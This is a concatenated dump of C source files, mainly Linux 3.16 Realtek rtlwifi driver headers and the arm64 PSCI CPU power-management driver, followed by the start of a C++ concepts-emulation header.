<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723com/dm_common.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#include "../wifi.h"
#include "dm_common.h"
#include "../rtl8723ae/dm.h"
#include <linux/module.h>
/* These routines are common to RTL8723AE and RTL8723BE */
void rtl8723_dm_init_dynamic_txpower(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
rtlpriv->dm.dynamic_txpower_enable = false;
rtlpriv->dm.last_dtp_lvl = TXHIGHPWRLEVEL_NORMAL;
rtlpriv->dm.dynamic_txhighpower_lvl = TXHIGHPWRLEVEL_NORMAL;
}
EXPORT_SYMBOL_GPL(rtl8723_dm_init_dynamic_txpower);
void rtl8723_dm_init_edca_turbo(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
rtlpriv->dm.current_turbo_edca = false;
rtlpriv->dm.is_any_nonbepkts = false;
rtlpriv->dm.is_cur_rdlstate = false;
}
EXPORT_SYMBOL_GPL(rtl8723_dm_init_edca_turbo);
void rtl8723_dm_init_dynamic_bb_powersaving(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
rtlpriv->dm_pstable.pre_ccastate = CCA_MAX;
rtlpriv->dm_pstable.cur_ccasate = CCA_MAX;
rtlpriv->dm_pstable.pre_rfstate = RF_MAX;
rtlpriv->dm_pstable.cur_rfstate = RF_MAX;
rtlpriv->dm_pstable.rssi_val_min = 0;
rtlpriv->dm_pstable.initialize = 0;
}
EXPORT_SYMBOL_GPL(rtl8723_dm_init_dynamic_bb_powersaving);
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723com/fw_common.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __FW_COMMON_H__
#define __FW_COMMON_H__
#define REG_SYS_FUNC_EN 0x0002
#define REG_MCUFWDL 0x0080
#define FW_8192C_START_ADDRESS 0x1000
#define FW_8192C_PAGE_SIZE 4096
#define FW_8192C_POLLING_TIMEOUT_COUNT 6000
#define FW_8192C_POLLING_DELAY 5
#define MCUFWDL_RDY BIT(1)
#define FWDL_CHKSUM_RPT BIT(2)
#define WINTINI_RDY BIT(6)
#define REG_RSV_CTRL 0x001C
#define REG_HMETFR 0x01CC
enum version_8723e {
VERSION_TEST_UMC_CHIP_8723 = 0x0081,
VERSION_NORMAL_UMC_CHIP_8723_1T1R_A_CUT = 0x0089,
VERSION_NORMAL_UMC_CHIP_8723_1T1R_B_CUT = 0x1089,
VERSION_TEST_CHIP_1T1R_8723B = 0x0106,
VERSION_NORMAL_SMIC_CHIP_1T1R_8723B = 0x010E,
VERSION_UNKNOWN = 0xFF,
};
enum rtl8723ae_h2c_cmd {
H2C_AP_OFFLOAD = 0,
H2C_SETPWRMODE = 1,
H2C_JOINBSSRPT = 2,
H2C_RSVDPAGE = 3,
H2C_RSSI_REPORT = 4,
H2C_P2P_PS_CTW_CMD = 5,
H2C_P2P_PS_OFFLOAD = 6,
H2C_RA_MASK = 7,
MAX_H2CCMD
};
enum rtl8723be_cmd {
H2C_8723BE_RSVDPAGE = 0,
H2C_8723BE_JOINBSSRPT = 1,
H2C_8723BE_SCAN = 2,
H2C_8723BE_KEEP_ALIVE_CTRL = 3,
H2C_8723BE_DISCONNECT_DECISION = 4,
H2C_8723BE_INIT_OFFLOAD = 6,
H2C_8723BE_AP_OFFLOAD = 8,
H2C_8723BE_BCN_RSVDPAGE = 9,
H2C_8723BE_PROBERSP_RSVDPAGE = 10,
H2C_8723BE_SETPWRMODE = 0x20,
H2C_8723BE_PS_TUNING_PARA = 0x21,
H2C_8723BE_PS_TUNING_PARA2 = 0x22,
H2C_8723BE_PS_LPS_PARA = 0x23,
H2C_8723BE_P2P_PS_OFFLOAD = 0x24,
H2C_8723BE_WO_WLAN = 0x80,
H2C_8723BE_REMOTE_WAKE_CTRL = 0x81,
H2C_8723BE_AOAC_GLOBAL_INFO = 0x82,
H2C_8723BE_AOAC_RSVDPAGE = 0x83,
H2C_8723BE_RSSI_REPORT = 0x42,
H2C_8723BE_RA_MASK = 0x40,
H2C_8723BE_SELECTIVE_SUSPEND_ROF_CMD,
H2C_8723BE_P2P_PS_MODE,
H2C_8723BE_PSD_RESULT,
/* CTW CMD for P2P is not defined yet */
H2C_8723BE_P2P_PS_CTW_CMD,
MAX_8723BE_H2CCMD
};
struct rtl92c_firmware_header {
u16 signature;
u8 category;
u8 function;
u16 version;
u8 subversion;
u8 rsvd1;
u8 month;
u8 date;
u8 hour;
u8 minute;
u16 ramcodesize;
u16 rsvd2;
u32 svnindex;
u32 rsvd3;
u32 rsvd4;
u32 rsvd5;
};
void rtl8723ae_firmware_selfreset(struct ieee80211_hw *hw);
void rtl8723be_firmware_selfreset(struct ieee80211_hw *hw);
void rtl8723_enable_fw_download(struct ieee80211_hw *hw, bool enable);
void rtl8723_fw_block_write(struct ieee80211_hw *hw,
const u8 *buffer, u32 size);
void rtl8723_fw_page_write(struct ieee80211_hw *hw,
u32 page, const u8 *buffer, u32 size);
void rtl8723_write_fw(struct ieee80211_hw *hw,
enum version_8723e version,
u8 *buffer, u32 size);
int rtl8723_fw_free_to_go(struct ieee80211_hw *hw, bool is_8723be);
int rtl8723_download_fw(struct ieee80211_hw *hw, bool is_8723be);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/phy.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE_PHY_H__
#define __RTL8723BE_PHY_H__
/* It must always be set to 4, otherwise the efuse table read sequence will be wrong. */
#define MAX_TX_COUNT 4
#define TX_1S 0
#define TX_2S 1
#define MAX_POWER_INDEX 0x3F
#define MAX_PRECMD_CNT 16
#define MAX_RFDEPENDCMD_CNT 16
#define MAX_POSTCMD_CNT 16
#define MAX_DOZE_WAITING_TIMES_9x 64
#define RT_CANNOT_IO(hw) false
#define HIGHPOWER_RADIOA_ARRAYLEN 22
#define IQK_ADDA_REG_NUM 16
#define IQK_BB_REG_NUM 9
#define MAX_TOLERANCE 5
#define IQK_DELAY_TIME 10
#define index_mapping_NUM 15
#define APK_BB_REG_NUM 5
#define APK_AFE_REG_NUM 16
#define APK_CURVE_REG_NUM 4
#define PATH_NUM 1
#define LOOP_LIMIT 5
#define MAX_STALL_TIME 50
#define ANTENNADIVERSITYVALUE 0x80
#define MAX_TXPWR_IDX_NMODE_92S 63
#define RESET_CNT_LIMIT 3
#define IQK_ADDA_REG_NUM 16
#define IQK_MAC_REG_NUM 4
#define RF6052_MAX_PATH 2
#define CT_OFFSET_MAC_ADDR 0X16
#define CT_OFFSET_CCK_TX_PWR_IDX 0x5A
#define CT_OFFSET_HT401S_TX_PWR_IDX 0x60
#define CT_OFFSET_HT402S_TX_PWR_IDX_DIFF 0x66
#define CT_OFFSET_HT20_TX_PWR_IDX_DIFF 0x69
#define CT_OFFSET_OFDM_TX_PWR_IDX_DIFF 0x6C
#define CT_OFFSET_HT40_MAX_PWR_OFFSET 0x6F
#define CT_OFFSET_HT20_MAX_PWR_OFFSET 0x72
#define CT_OFFSET_CHANNEL_PLAH 0x75
#define CT_OFFSET_THERMAL_METER 0x78
#define CT_OFFSET_RF_OPTION 0x79
#define CT_OFFSET_VERSION 0x7E
#define CT_OFFSET_CUSTOMER_ID 0x7F
#define RTL92C_MAX_PATH_NUM 2
enum hw90_block_e {
HW90_BLOCK_MAC = 0,
HW90_BLOCK_PHY0 = 1,
HW90_BLOCK_PHY1 = 2,
HW90_BLOCK_RF = 3,
HW90_BLOCK_MAXIMUM = 4,
};
enum baseband_config_type {
BASEBAND_CONFIG_PHY_REG = 0,
BASEBAND_CONFIG_AGC_TAB = 1,
};
enum ra_offset_area {
RA_OFFSET_LEGACY_OFDM1,
RA_OFFSET_LEGACY_OFDM2,
RA_OFFSET_HT_OFDM1,
RA_OFFSET_HT_OFDM2,
RA_OFFSET_HT_OFDM3,
RA_OFFSET_HT_OFDM4,
RA_OFFSET_HT_CCK,
};
enum antenna_path {
ANTENNA_NONE,
ANTENNA_D,
ANTENNA_C,
ANTENNA_CD,
ANTENNA_B,
ANTENNA_BD,
ANTENNA_BC,
ANTENNA_BCD,
ANTENNA_A,
ANTENNA_AD,
ANTENNA_AC,
ANTENNA_ACD,
ANTENNA_AB,
ANTENNA_ABD,
ANTENNA_ABC,
ANTENNA_ABCD
};
struct r_antenna_select_ofdm {
u32 r_tx_antenna:4;
u32 r_ant_l:4;
u32 r_ant_non_ht:4;
u32 r_ant_ht1:4;
u32 r_ant_ht2:4;
u32 r_ant_ht_s1:4;
u32 r_ant_non_ht_s1:4;
u32 ofdm_txsc:2;
u32 reserved:2;
};
struct r_antenna_select_cck {
u8 r_cckrx_enable_2:2;
u8 r_cckrx_enable:2;
u8 r_ccktx_enable:4;
};
struct efuse_contents {
u8 mac_addr[ETH_ALEN];
u8 cck_tx_power_idx[6];
u8 ht40_1s_tx_power_idx[6];
u8 ht40_2s_tx_power_idx_diff[3];
u8 ht20_tx_power_idx_diff[3];
u8 ofdm_tx_power_idx_diff[3];
u8 ht40_max_power_offset[3];
u8 ht20_max_power_offset[3];
u8 channel_plan;
u8 thermal_meter;
u8 rf_option[5];
u8 version;
u8 oem_id;
u8 regulatory;
};
struct tx_power_struct {
u8 cck[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 ht40_1s[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 ht40_2s[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 ht20_diff[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 legacy_ht_diff[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 legacy_ht_txpowerdiff;
u8 groupht20[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 groupht40[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 pwrgroup_cnt;
u32 mcs_original_offset[4][16];
};
enum _ANT_DIV_TYPE {
NO_ANTDIV = 0xFF,
CG_TRX_HW_ANTDIV = 0x01,
CGCS_RX_HW_ANTDIV = 0x02,
FIXED_HW_ANTDIV = 0x03,
CG_TRX_SMART_ANTDIV = 0x04,
CGCS_RX_SW_ANTDIV = 0x05,
};
u32 rtl8723be_phy_query_rf_reg(struct ieee80211_hw *hw,
enum radio_path rfpath,
u32 regaddr, u32 bitmask);
void rtl8723be_phy_set_rf_reg(struct ieee80211_hw *hw,
enum radio_path rfpath,
u32 regaddr, u32 bitmask, u32 data);
bool rtl8723be_phy_mac_config(struct ieee80211_hw *hw);
bool rtl8723be_phy_bb_config(struct ieee80211_hw *hw);
bool rtl8723be_phy_rf_config(struct ieee80211_hw *hw);
void rtl8723be_phy_get_hw_reg_originalvalue(struct ieee80211_hw *hw);
void rtl8723be_phy_get_txpower_level(struct ieee80211_hw *hw,
long *powerlevel);
void rtl8723be_phy_set_txpower_level(struct ieee80211_hw *hw,
u8 channel);
void rtl8723be_phy_scan_operation_backup(struct ieee80211_hw *hw,
u8 operation);
void rtl8723be_phy_set_bw_mode_callback(struct ieee80211_hw *hw);
void rtl8723be_phy_set_bw_mode(struct ieee80211_hw *hw,
enum nl80211_channel_type ch_type);
void rtl8723be_phy_sw_chnl_callback(struct ieee80211_hw *hw);
u8 rtl8723be_phy_sw_chnl(struct ieee80211_hw *hw);
void rtl8723be_phy_iq_calibrate(struct ieee80211_hw *hw,
bool b_recovery);
void rtl23b_phy_ap_calibrate(struct ieee80211_hw *hw, char delta);
void rtl8723be_phy_lc_calibrate(struct ieee80211_hw *hw);
void rtl8723be_phy_set_rfpath_switch(struct ieee80211_hw *hw, bool bmain);
bool rtl8723be_phy_config_rf_with_headerfile(struct ieee80211_hw *hw,
enum radio_path rfpath);
bool rtl8723be_phy_set_io_cmd(struct ieee80211_hw *hw, enum io_type iotype);
bool rtl8723be_phy_set_rf_power_state(struct ieee80211_hw *hw,
enum rf_pwrstate rfpwr_state);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/btcoexist/rtl_btc.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2010 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL_BTC_H__
#define __RTL_BTC_H__
#include "halbt_precomp.h"
void rtl_btc_init_variables(struct rtl_priv *rtlpriv);
void rtl_btc_init_hal_vars(struct rtl_priv *rtlpriv);
void rtl_btc_init_hw_config(struct rtl_priv *rtlpriv);
void rtl_btc_ips_notify(struct rtl_priv *rtlpriv, u8 type);
void rtl_btc_scan_notify(struct rtl_priv *rtlpriv, u8 scantype);
void rtl_btc_connect_notify(struct rtl_priv *rtlpriv, u8 action);
void rtl_btc_mediastatus_notify(struct rtl_priv *rtlpriv,
enum _RT_MEDIA_STATUS mstatus);
void rtl_btc_periodical(struct rtl_priv *rtlpriv);
void rtl_btc_halt_notify(void);
void rtl_btc_btinfo_notify(struct rtl_priv *rtlpriv, u8 *tmpbuf, u8 length);
bool rtl_btc_is_limited_dig(struct rtl_priv *rtlpriv);
bool rtl_btc_is_disable_edca_turbo(struct rtl_priv *rtlpriv);
bool rtl_btc_is_bt_disabled(struct rtl_priv *rtlpriv);
struct rtl_btc_ops *rtl_btc_get_ops_pointer(void);
u8 rtl_get_hwpg_ant_num(struct rtl_priv *rtlpriv);
u8 rtl_get_hwpg_bt_exist(struct rtl_priv *rtlpriv);
u8 rtl_get_hwpg_bt_type(struct rtl_priv *rtlpriv);
enum _RT_MEDIA_STATUS mgnt_link_status_query(struct ieee80211_hw *hw);
#endif
<|start_filename|>linux-3.16/arch/arm64/kernel/psci.c<|end_filename|>
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* Copyright (C) 2013 ARM Limited
*
* Author: <NAME> <<EMAIL>>
*/
#define pr_fmt(fmt) "psci: " fmt
#include <linux/init.h>
#include <linux/of.h>
#include <linux/smp.h>
#include <linux/reboot.h>
#include <linux/pm.h>
#include <linux/delay.h>
#include <uapi/linux/psci.h>
#include <asm/compiler.h>
#include <asm/cpu_ops.h>
#include <asm/errno.h>
#include <asm/psci.h>
#include <asm/smp_plat.h>
#include <asm/system_misc.h>
#define PSCI_POWER_STATE_TYPE_STANDBY 0
#define PSCI_POWER_STATE_TYPE_POWER_DOWN 1
struct psci_power_state {
u16 id;
u8 type;
u8 affinity_level;
};
struct psci_operations {
int (*cpu_suspend)(struct psci_power_state state,
unsigned long entry_point);
int (*cpu_off)(struct psci_power_state state);
int (*cpu_on)(unsigned long cpuid, unsigned long entry_point);
int (*migrate)(unsigned long cpuid);
int (*affinity_info)(unsigned long target_affinity,
unsigned long lowest_affinity_level);
int (*migrate_info_type)(void);
};
static struct psci_operations psci_ops;
static int (*invoke_psci_fn)(u64, u64, u64, u64);
typedef int (*psci_initcall_t)(const struct device_node *);
enum psci_function {
PSCI_FN_CPU_SUSPEND,
PSCI_FN_CPU_ON,
PSCI_FN_CPU_OFF,
PSCI_FN_MIGRATE,
PSCI_FN_AFFINITY_INFO,
PSCI_FN_MIGRATE_INFO_TYPE,
PSCI_FN_MAX,
};
static u32 psci_function_id[PSCI_FN_MAX];
static int psci_to_linux_errno(int errno)
{
switch (errno) {
case PSCI_RET_SUCCESS:
return 0;
case PSCI_RET_NOT_SUPPORTED:
return -EOPNOTSUPP;
case PSCI_RET_INVALID_PARAMS:
return -EINVAL;
case PSCI_RET_DENIED:
return -EPERM;
};
return -EINVAL;
}
static u32 psci_power_state_pack(struct psci_power_state state)
{
return ((state.id << PSCI_0_2_POWER_STATE_ID_SHIFT)
& PSCI_0_2_POWER_STATE_ID_MASK) |
((state.type << PSCI_0_2_POWER_STATE_TYPE_SHIFT)
& PSCI_0_2_POWER_STATE_TYPE_MASK) |
((state.affinity_level << PSCI_0_2_POWER_STATE_AFFL_SHIFT)
& PSCI_0_2_POWER_STATE_AFFL_MASK);
}
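/*
 * Worked example (sketch): assuming the v0.2 uapi layout keeps the state ID
 * in bits [15:0], the type in bit 16 and the affinity level in bits [25:24],
 * a plain power-down request for affinity level 0 packs to 0x00010000.
 */
static u32 __maybe_unused example_power_down_state(void)
{
	struct psci_power_state state = {
		.type = PSCI_POWER_STATE_TYPE_POWER_DOWN,
	};

	return psci_power_state_pack(state);	/* 0x00010000 under that layout */
}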
/*
* The following two functions are invoked via the invoke_psci_fn pointer
* and will not be inlined, allowing us to piggyback on the AAPCS.
*/
static noinline int __invoke_psci_fn_hvc(u64 function_id, u64 arg0, u64 arg1,
u64 arg2)
{
asm volatile(
__asmeq("%0", "x0")
__asmeq("%1", "x1")
__asmeq("%2", "x2")
__asmeq("%3", "x3")
"hvc #0\n"
: "+r" (function_id)
: "r" (arg0), "r" (arg1), "r" (arg2));
return function_id;
}
static noinline int __invoke_psci_fn_smc(u64 function_id, u64 arg0, u64 arg1,
u64 arg2)
{
asm volatile(
__asmeq("%0", "x0")
__asmeq("%1", "x1")
__asmeq("%2", "x2")
__asmeq("%3", "x3")
"smc #0\n"
: "+r" (function_id)
: "r" (arg0), "r" (arg1), "r" (arg2));
return function_id;
}
static int psci_get_version(void)
{
int err;
err = invoke_psci_fn(PSCI_0_2_FN_PSCI_VERSION, 0, 0, 0);
return err;
}
static int psci_cpu_suspend(struct psci_power_state state,
unsigned long entry_point)
{
int err;
u32 fn, power_state;
fn = psci_function_id[PSCI_FN_CPU_SUSPEND];
power_state = psci_power_state_pack(state);
err = invoke_psci_fn(fn, power_state, entry_point, 0);
return psci_to_linux_errno(err);
}
static int psci_cpu_off(struct psci_power_state state)
{
int err;
u32 fn, power_state;
fn = psci_function_id[PSCI_FN_CPU_OFF];
power_state = psci_power_state_pack(state);
err = invoke_psci_fn(fn, power_state, 0, 0);
return psci_to_linux_errno(err);
}
static int psci_cpu_on(unsigned long cpuid, unsigned long entry_point)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_CPU_ON];
err = invoke_psci_fn(fn, cpuid, entry_point, 0);
return psci_to_linux_errno(err);
}
static int psci_migrate(unsigned long cpuid)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_MIGRATE];
err = invoke_psci_fn(fn, cpuid, 0, 0);
return psci_to_linux_errno(err);
}
static int psci_affinity_info(unsigned long target_affinity,
unsigned long lowest_affinity_level)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_AFFINITY_INFO];
err = invoke_psci_fn(fn, target_affinity, lowest_affinity_level, 0);
return err;
}
static int psci_migrate_info_type(void)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_MIGRATE_INFO_TYPE];
err = invoke_psci_fn(fn, 0, 0, 0);
return err;
}
static int get_set_conduit_method(struct device_node *np)
{
const char *method;
pr_info("probing for conduit method from DT.\n");
if (of_property_read_string(np, "method", &method)) {
pr_warn("missing \"method\" property\n");
return -ENXIO;
}
if (!strcmp("hvc", method)) {
invoke_psci_fn = __invoke_psci_fn_hvc;
} else if (!strcmp("smc", method)) {
invoke_psci_fn = __invoke_psci_fn_smc;
} else {
pr_warn("invalid \"method\" property: %s\n", method);
return -EINVAL;
}
return 0;
}
static void psci_sys_reset(enum reboot_mode reboot_mode, const char *cmd)
{
invoke_psci_fn(PSCI_0_2_FN_SYSTEM_RESET, 0, 0, 0);
}
static void psci_sys_poweroff(void)
{
invoke_psci_fn(PSCI_0_2_FN_SYSTEM_OFF, 0, 0, 0);
}
/*
* PSCI Function IDs for v0.2+ are well defined so use
* standard values.
*/
static int psci_0_2_init(struct device_node *np)
{
int err, ver;
err = get_set_conduit_method(np);
if (err)
goto out_put_node;
ver = psci_get_version();
if (ver == PSCI_RET_NOT_SUPPORTED) {
/* PSCI v0.2 mandates implementation of PSCI_ID_VERSION. */
pr_err("PSCI firmware does not comply with the v0.2 spec.\n");
err = -EOPNOTSUPP;
goto out_put_node;
} else {
pr_info("PSCIv%d.%d detected in firmware.\n",
PSCI_VERSION_MAJOR(ver),
PSCI_VERSION_MINOR(ver));
if (PSCI_VERSION_MAJOR(ver) == 0 &&
PSCI_VERSION_MINOR(ver) < 2) {
err = -EINVAL;
pr_err("Conflicting PSCI version detected.\n");
goto out_put_node;
}
}
pr_info("Using standard PSCI v0.2 function IDs\n");
psci_function_id[PSCI_FN_CPU_SUSPEND] = PSCI_0_2_FN64_CPU_SUSPEND;
psci_ops.cpu_suspend = psci_cpu_suspend;
psci_function_id[PSCI_FN_CPU_OFF] = PSCI_0_2_FN_CPU_OFF;
psci_ops.cpu_off = psci_cpu_off;
psci_function_id[PSCI_FN_CPU_ON] = PSCI_0_2_FN64_CPU_ON;
psci_ops.cpu_on = psci_cpu_on;
psci_function_id[PSCI_FN_MIGRATE] = PSCI_0_2_FN64_MIGRATE;
psci_ops.migrate = psci_migrate;
psci_function_id[PSCI_FN_AFFINITY_INFO] = PSCI_0_2_FN64_AFFINITY_INFO;
psci_ops.affinity_info = psci_affinity_info;
psci_function_id[PSCI_FN_MIGRATE_INFO_TYPE] =
PSCI_0_2_FN_MIGRATE_INFO_TYPE;
psci_ops.migrate_info_type = psci_migrate_info_type;
arm_pm_restart = psci_sys_reset;
pm_power_off = psci_sys_poweroff;
out_put_node:
of_node_put(np);
return err;
}
/*
 * PSCI < v0.2 gets PSCI Function IDs via DT.
*/
static int psci_0_1_init(struct device_node *np)
{
u32 id;
int err;
err = get_set_conduit_method(np);
if (err)
goto out_put_node;
pr_info("Using PSCI v0.1 Function IDs from DT\n");
if (!of_property_read_u32(np, "cpu_suspend", &id)) {
psci_function_id[PSCI_FN_CPU_SUSPEND] = id;
psci_ops.cpu_suspend = psci_cpu_suspend;
}
if (!of_property_read_u32(np, "cpu_off", &id)) {
psci_function_id[PSCI_FN_CPU_OFF] = id;
psci_ops.cpu_off = psci_cpu_off;
}
if (!of_property_read_u32(np, "cpu_on", &id)) {
psci_function_id[PSCI_FN_CPU_ON] = id;
psci_ops.cpu_on = psci_cpu_on;
}
if (!of_property_read_u32(np, "migrate", &id)) {
psci_function_id[PSCI_FN_MIGRATE] = id;
psci_ops.migrate = psci_migrate;
}
out_put_node:
of_node_put(np);
return err;
}
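/*
 * Illustrative pre-v0.2 device-tree node (sketch only; the function ID
 * values are placeholders, not taken from any real platform).  The property
 * names match the of_property_read_u32() lookups above:
 *
 *	psci {
 *		compatible  = "arm,psci";
 *		method      = "smc";
 *		cpu_suspend = <0x95c10000>;
 *		cpu_off     = <0x95c10001>;
 *		cpu_on      = <0x95c10002>;
 *		migrate     = <0x95c10003>;
 *	};
 */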
static const struct of_device_id psci_of_match[] __initconst = {
{ .compatible = "arm,psci", .data = psci_0_1_init},
{ .compatible = "arm,psci-0.2", .data = psci_0_2_init},
{},
};
int __init psci_init(void)
{
struct device_node *np;
const struct of_device_id *matched_np;
psci_initcall_t init_fn;
np = of_find_matching_node_and_match(NULL, psci_of_match, &matched_np);
if (!np)
return -ENODEV;
init_fn = (psci_initcall_t)matched_np->data;
return init_fn(np);
}
#ifdef CONFIG_SMP
static int __init cpu_psci_cpu_init(struct device_node *dn, unsigned int cpu)
{
return 0;
}
static int __init cpu_psci_cpu_prepare(unsigned int cpu)
{
if (!psci_ops.cpu_on) {
pr_err("no cpu_on method, not booting CPU%d\n", cpu);
return -ENODEV;
}
return 0;
}
static int cpu_psci_cpu_boot(unsigned int cpu)
{
int err = psci_ops.cpu_on(cpu_logical_map(cpu), __pa(secondary_entry));
if (err)
pr_err("failed to boot CPU%d (%d)\n", cpu, err);
return err;
}
#ifdef CONFIG_HOTPLUG_CPU
static int cpu_psci_cpu_disable(unsigned int cpu)
{
/* Fail early if we don't have CPU_OFF support */
if (!psci_ops.cpu_off)
return -EOPNOTSUPP;
return 0;
}
static void cpu_psci_cpu_die(unsigned int cpu)
{
int ret;
/*
* There are no known implementations of PSCI actually using the
 * power state field, so pass a sensible default for now.
*/
struct psci_power_state state = {
.type = PSCI_POWER_STATE_TYPE_POWER_DOWN,
};
ret = psci_ops.cpu_off(state);
pr_crit("unable to power off CPU%u (%d)\n", cpu, ret);
}
static int cpu_psci_cpu_kill(unsigned int cpu)
{
int err, i;
if (!psci_ops.affinity_info)
return 1;
/*
* cpu_kill could race with cpu_die and we can
* potentially end up declaring this cpu undead
* while it is dying. So, try again a few times.
*/
for (i = 0; i < 10; i++) {
err = psci_ops.affinity_info(cpu_logical_map(cpu), 0);
if (err == PSCI_0_2_AFFINITY_LEVEL_OFF) {
pr_info("CPU%d killed.\n", cpu);
return 1;
}
msleep(10);
pr_info("Retrying again to check for CPU kill\n");
}
pr_warn("CPU%d may not have shut down cleanly (AFFINITY_INFO reports %d)\n",
cpu, err);
/* Make op_cpu_kill() fail. */
return 0;
}
#endif
const struct cpu_operations cpu_psci_ops = {
.name = "psci",
.cpu_init = cpu_psci_cpu_init,
.cpu_prepare = cpu_psci_cpu_prepare,
.cpu_boot = cpu_psci_cpu_boot,
#ifdef CONFIG_HOTPLUG_CPU
.cpu_disable = cpu_psci_cpu_disable,
.cpu_die = cpu_psci_cpu_die,
.cpu_kill = cpu_psci_cpu_kill,
#endif
};
#endif
<|start_filename|>include/slce/slce.hpp<|end_filename|>
/*
* Copyright (c) 2019 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#ifndef SLCE_STANDARD_LIBRARY_CONCEPTS_EMULATION_LIBRARY_HPP
#define SLCE_STANDARD_LIBRARY_CONCEPTS_EMULATION_LIBRARY_HPP
#include <type_traits>
#include <iterator>
#ifdef __cpp_lib_ranges
#include <ranges>
#endif
#ifdef __cpp_variable_templates
#define SLCE_ENABLE_CXX14
#ifdef __cpp_concepts
#define SLCE_ENABLE_CONCEPTS_TS
#endif
#endif
#if __cplusplus > 201703L && !defined(SLCE_ENABLE_CONCEPTS_TS)
#define SLCE_ENABLE_CXX20
#endif
#ifdef SLCE_ENABLE_CONCEPTS_TS
#define SLCE_BOOL bool
#define SLCE_ENABLE_CONCEPTS
#elif defined( SLCE_ENABLE_CXX20 )
#define SLCE_BOOL
#define SLCE_ENABLE_CONCEPTS
#endif
